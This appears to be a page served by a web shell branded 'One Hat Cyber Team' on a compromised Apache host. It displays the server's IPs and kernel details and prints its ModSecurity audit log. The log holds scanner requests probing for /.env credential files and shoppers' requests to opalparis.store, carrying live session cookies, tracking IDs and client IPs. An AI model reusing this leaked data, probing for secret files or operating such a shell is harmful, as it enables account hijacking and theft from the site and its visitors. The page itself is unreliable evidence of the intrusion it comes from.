⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
var
/
log
/
View File Name :
modsec_audit.log
--0964de0f-A-- [24/Jul/2025:00:08:39.009338 +0300] aIFPV1ooLYw4or2LgWJ1RwAAANY 78.153.140.203 37306 127.0.0.1 7080 --0964de0f-B-- GET /.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 78.153.140.203 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 --0964de0f-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --0964de0f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/.env"] [unique_id "aIFPV1ooLYw4or2LgWJ1RwAAANY"] Stopwatch: 1753304919002210 7195 (- - -) Stopwatch2: 1753304919002210 7195; combined=4117, p1=687, p2=3272, p3=29, p4=38, p5=91, sr=191, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0964de0f-Z-- --6001ff49-A-- [24/Jul/2025:00:08:39.230843 +0300] aIFPV1ooLYw4or2LgWJ1SAAAAMg 78.153.140.203 37310 127.0.0.1 7080 --6001ff49-B-- GET /api/.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 78.153.140.203 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0 --6001ff49-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --6001ff49-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/api/.env"] [unique_id "aIFPV1ooLYw4or2LgWJ1SAAAAMg"] Stopwatch: 1753304919225783 5132 (- - -) Stopwatch2: 1753304919225783 5132; combined=3146, p1=737, p2=2209, p3=27, p4=37, p5=136, sr=187, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6001ff49-Z-- --3f6af70d-A-- [24/Jul/2025:00:08:39.451160 +0300] aIFPV0dutIOpb_kg22h5pQAAAAA 78.153.140.203 37320 127.0.0.1 7080 --3f6af70d-B-- GET /backend/.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 78.153.140.203 Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [de] --3f6af70d-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f6af70d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/backend/.env"] [unique_id "aIFPV0dutIOpb_kg22h5pQAAAAA"] Stopwatch: 1753304919445941 5359 (- - -) Stopwatch2: 1753304919445941 5359; combined=3249, p1=649, p2=2413, p3=27, p4=38, p5=122, sr=219, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f6af70d-Z-- --620c824f-A-- [24/Jul/2025:00:08:39.671667 +0300] aIFPV1ooLYw4or2LgWJ1SQAAANc 78.153.140.203 37336 127.0.0.1 7080 --620c824f-B-- GET /admin/.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 78.153.140.203 Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --620c824f-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --620c824f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/admin/.env"] [unique_id "aIFPV1ooLYw4or2LgWJ1SQAAANc"] Stopwatch: 1753304919666874 4877 (- - -) Stopwatch2: 1753304919666874 4877; combined=2960, p1=702, p2=2087, p3=26, p4=53, p5=92, sr=246, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --620c824f-Z-- --6615d86e-A-- [24/Jul/2025:00:08:39.958379 +0300] aIFPV1ooLYw4or2LgWJ1SgAAANg 78.153.140.203 37340 127.0.0.1 7080 --6615d86e-B-- GET /.env.example HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 78.153.140.203 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre --6615d86e-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --6615d86e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/.env.example"] [unique_id "aIFPV1ooLYw4or2LgWJ1SgAAANg"] Stopwatch: 1753304919953867 4581 (- - -) Stopwatch2: 1753304919953867 4581; combined=2907, p1=563, p2=2132, p3=27, p4=36, p5=148, sr=151, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6615d86e-Z-- --a9e30711-A-- [24/Jul/2025:00:10:15.061737 +0300] aIFPtEdutIOpb_kg22h50AAAAAs 197.37.187.63 57226 127.0.0.1 7081 --a9e30711-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: opalparis.store X-Real-IP: 197.37.187.63 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 1173 content-type: text/plain;charset=UTF-8 accept: */* sec-fetch-site: same-origin accept-language: en-GB,en-US;q=0.9,en;q=0.8 accept-encoding: gzip, deflate, br sec-fetch-mode: cors origin: https://opalparis.store user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22F76 Instagram 381.1.2.26.83 (iPhone11,6; iOS 18_5; en_US; en; scale=3.00; 1242x2688; IABMV/1; 737297623) referer: https://opalparis.store/product/push-up-bra-with-sheer-mesh/ sec-fetch-dest: empty cookie: _fbc=fb.1.1753304996719.PAZXh0bgNhZW0CMTAAAafA0wgWGRNQfOT18qvGf1ijM9HjDXf99sOCCBiLH3FRMx7B5sLRqXMsJNukkw_aem_W8B4TJlhSv6oA73yPq7BGQ; _fbp=fb.1.1753271801131.881201212355184295; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fopalparis.store%2Fproduct%2Fpush-up-bra-with-sheer-mesh%2F; tk_qs=session_id%3D%26blog_id%3D245943483%26store_id%3D08cc8d12-0c1d-42f3-8519-7c52fd206c9a%26ui%3D%26url%3Dhttps%253A%252F%252Fopalparis.store%26landing_page%3D%26woo_version%3D9.9.5%26wp_version%3D6.8.1%26store_admin%3D0%26device%3Dmobile%26template_used%3D0%26additional_blocks_on_cart_page%3D%26additional_blocks_on_checkout_page%3D%26store_currency%3DEGP%26timezone%3D%252B00%253A00%26is_guest%3D1%26order_value%3D0%26order_total%3D0%26total_tax%3D0%26total_discount%3D0%26total_shipping%3D0%26products_count%3D0%26cart_page_contains_cart_block%3D1%26cart_page_contains_cart_shortcode%3D0%26checkout_page_contains_checkout_block%3D1%26checkout_page_contains_checkout_shortcode%3D0%26pi%3D351%26pn%3DPush-Up%2520bra%2520with%2520sheer%2520mesh%26pc%3DBras%252FUnderwear%26pp%3D300%26pt%3Dvariable%26lr%3D%26or%3D%26r3d%3D%26_en%3Dwoocommerceanalytics_product_view%26_ui%3D8pbHRxYVwWshauA92quN8yt7%26_ut%3Danon%26_ts%3D1753305012597%26_tz%3D-3%26_lg%3Den-GB%26_pf%3DiPhone%26_ht%3D896%26_wd%3D414%26_sx%3D0%26_sy%3D0%26_dl%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fpush-up-bra-with-sheer-mesh%252F%26_dr%3Dhttps%253A%252F%252Fopalparis.store%252F; woocommerce_recently_viewed=351; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_current_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_migrations=1418474375998%3D1; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2018_5%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Mobile%2F22F76%20Instagram%20381.1.2.26.83%20%28iPhone11%2C6%3B%20iOS%2018_5%3B%20en_US%3B%20en%3B%20scale%3D3.00%3B%201242x2688%3B%20IABMV%2F1%3B%20737297623%29; tk_lr=%22%22; tk_or=%22%22; tk_r3d=%22%22; tk_ai=8pbHRxYVwWshauA92quN8yt7; PHPSESSID=aqpa250unm0kdqqh9sp9jnklo1 --a9e30711-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://opalparis.store Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --a9e30711-E-- --a9e30711-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "opalparis.store"] [uri "/"] [unique_id "aIFPtEdutIOpb_kg22h50AAAAAs"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "opalparis.store"] [uri "/index.php"] [unique_id "aIFPtEdutIOpb_kg22h50AAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/opalparis.store/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753305012764419 2297522 (- - -) Stopwatch2: 1753305012764419 2297522; combined=22798, p1=1150, p2=21139, p3=275, p4=57, p5=177, sr=218, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9e30711-Z-- --084f2c7d-A-- [24/Jul/2025:00:10:15.463418 +0300] aIFPtFooLYw4or2LgWJ1tAAAANg 197.37.187.63 57220 127.0.0.1 7081 --084f2c7d-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: opalparis.store X-Real-IP: 197.37.187.63 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 824 content-type: text/plain;charset=UTF-8 accept: */* sec-fetch-site: same-origin accept-language: en-GB,en-US;q=0.9,en;q=0.8 accept-encoding: gzip, deflate, br sec-fetch-mode: cors origin: https://opalparis.store user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22F76 Instagram 381.1.2.26.83 (iPhone11,6; iOS 18_5; en_US; en; scale=3.00; 1242x2688; IABMV/1; 737297623) referer: https://opalparis.store/product/push-up-bra-with-sheer-mesh/ sec-fetch-dest: empty cookie: _fbc=fb.1.1753304996719.PAZXh0bgNhZW0CMTAAAafA0wgWGRNQfOT18qvGf1ijM9HjDXf99sOCCBiLH3FRMx7B5sLRqXMsJNukkw_aem_W8B4TJlhSv6oA73yPq7BGQ; _fbp=fb.1.1753271801131.881201212355184295; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fopalparis.store%2Fproduct%2Fpush-up-bra-with-sheer-mesh%2F; tk_qs=session_id%3D%26blog_id%3D245943483%26store_id%3D08cc8d12-0c1d-42f3-8519-7c52fd206c9a%26ui%3D%26url%3Dhttps%253A%252F%252Fopalparis.store%26landing_page%3D%26woo_version%3D9.9.5%26wp_version%3D6.8.1%26store_admin%3D0%26device%3Dmobile%26template_used%3D0%26additional_blocks_on_cart_page%3D%26additional_blocks_on_checkout_page%3D%26store_currency%3DEGP%26timezone%3D%252B00%253A00%26is_guest%3D1%26order_value%3D0%26order_total%3D0%26total_tax%3D0%26total_discount%3D0%26total_shipping%3D0%26products_count%3D0%26cart_page_contains_cart_block%3D1%26cart_page_contains_cart_shortcode%3D0%26checkout_page_contains_checkout_block%3D1%26checkout_page_contains_checkout_shortcode%3D0%26pi%3D351%26pn%3DPush-Up%2520bra%2520with%2520sheer%2520mesh%26pc%3DBras%252FUnderwear%26pp%3D300%26pt%3Dvariable%26lr%3D%26or%3D%26r3d%3D%26_en%3Dwoocommerceanalytics_product_view%26_ui%3D8pbHRxYVwWshauA92quN8yt7%26_ut%3Danon%26_ts%3D1753305012597%26_tz%3D-3%26_lg%3Den-GB%26_pf%3DiPhone%26_ht%3D896%26_wd%3D414%26_sx%3D0%26_sy%3D0%26_dl%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fpush-up-bra-with-sheer-mesh%252F%26_dr%3Dhttps%253A%252F%252Fopalparis.store%252F; woocommerce_recently_viewed=351; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_current_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_migrations=1418474375998%3D1; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2018_5%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Mobile%2F22F76%20Instagram%20381.1.2.26.83%20%28iPhone11%2C6%3B%20iOS%2018_5%3B%20en_US%3B%20en%3B%20scale%3D3.00%3B%201242x2688%3B%20IABMV%2F1%3B%20737297623%29; tk_lr=%22%22; tk_or=%22%22; tk_r3d=%22%22; tk_ai=8pbHRxYVwWshauA92quN8yt7; PHPSESSID=aqpa250unm0kdqqh9sp9jnklo1 --084f2c7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://opalparis.store Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --084f2c7d-E-- --084f2c7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "opalparis.store"] [uri "/"] [unique_id "aIFPtFooLYw4or2LgWJ1tAAAANg"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "opalparis.store"] [uri "/index.php"] [unique_id "aIFPtFooLYw4or2LgWJ1tAAAANg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/opalparis.store/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753305012759534 2704036 (- - -) Stopwatch2: 1753305012759534 2704036; combined=23948, p1=1061, p2=22464, p3=218, p4=55, p5=149, sr=164, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --084f2c7d-Z-- --216c920a-A-- [24/Jul/2025:00:10:46.791355 +0300] aIFP1EdutIOpb_kg22h54QAAAAk 197.37.187.63 49878 127.0.0.1 7081 --216c920a-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: opalparis.store X-Real-IP: 197.37.187.63 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 1146 content-type: text/plain;charset=UTF-8 accept: */* sec-fetch-site: same-origin accept-language: en-GB,en-US;q=0.9,en;q=0.8 accept-encoding: gzip, deflate, br sec-fetch-mode: cors origin: https://opalparis.store user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22F76 Instagram 381.1.2.26.83 (iPhone11,6; iOS 18_5; en_US; en; scale=3.00; 1242x2688; IABMV/1; 737297623) referer: https://opalparis.store/product/bold-now/ sec-fetch-dest: empty cookie: _fbc=fb.1.1753304996719.PAZXh0bgNhZW0CMTAAAafA0wgWGRNQfOT18qvGf1ijM9HjDXf99sOCCBiLH3FRMx7B5sLRqXMsJNukkw_aem_W8B4TJlhSv6oA73yPq7BGQ; _fbp=fb.1.1753271801131.881201212355184295; sbjs_session=pgs%3D3%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fopalparis.store%2Fproduct%2Fbold-now%2F; tk_qs=session_id%3D%26blog_id%3D245943483%26store_id%3D08cc8d12-0c1d-42f3-8519-7c52fd206c9a%26ui%3D%26url%3Dhttps%253A%252F%252Fopalparis.store%26landing_page%3D%26woo_version%3D9.9.5%26wp_version%3D6.8.1%26store_admin%3D0%26device%3Dmobile%26template_used%3D0%26additional_blocks_on_cart_page%3D%26additional_blocks_on_checkout_page%3D%26store_currency%3DEGP%26timezone%3D%252B00%253A00%26is_guest%3D1%26order_value%3D0%26order_total%3D0%26total_tax%3D0%26total_discount%3D0%26total_shipping%3D0%26products_count%3D0%26cart_page_contains_cart_block%3D1%26cart_page_contains_cart_shortcode%3D0%26checkout_page_contains_checkout_block%3D1%26checkout_page_contains_checkout_shortcode%3D0%26pi%3D981%26pn%3DBold%2520now%26pc%3DBras%252FUnderwear%26pp%3D400%26pt%3Dvariable%26lr%3D%26or%3D%26r3d%3D%26_en%3Dwoocommerceanalytics_product_view%26_ui%3D8pbHRxYVwWshauA92quN8yt7%26_ut%3Danon%26_ts%3D1753305044183%26_tz%3D-3%26_lg%3Den-GB%26_pf%3DiPhone%26_ht%3D896%26_wd%3D414%26_sx%3D0%26_sy%3D0%26_dl%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fbold-now%252F%26_dr%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fpush-up-bra-with-sheer-mesh%252F; woocommerce_recently_viewed=351%7C981; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_current_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_migrations=1418474375998%3D1; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2018_5%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Mobile%2F22F76%20Instagram%20381.1.2.26.83%20%28iPhone11%2C6%3B%20iOS%2018_5%3B%20en_US%3B%20en%3B%20scale%3D3.00%3B%201242x2688%3B%20IABMV%2F1%3B%20737297623%29; tk_lr=%22%22; tk_or=%22%22; tk_r3d=%22%22; tk_ai=8pbHRxYVwWshauA92quN8yt7; PHPSESSID=aqpa250unm0kdqqh9sp9jnklo1 --216c920a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://opalparis.store Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --216c920a-E-- --216c920a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "opalparis.store"] [uri "/"] [unique_id "aIFP1EdutIOpb_kg22h54QAAAAk"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file 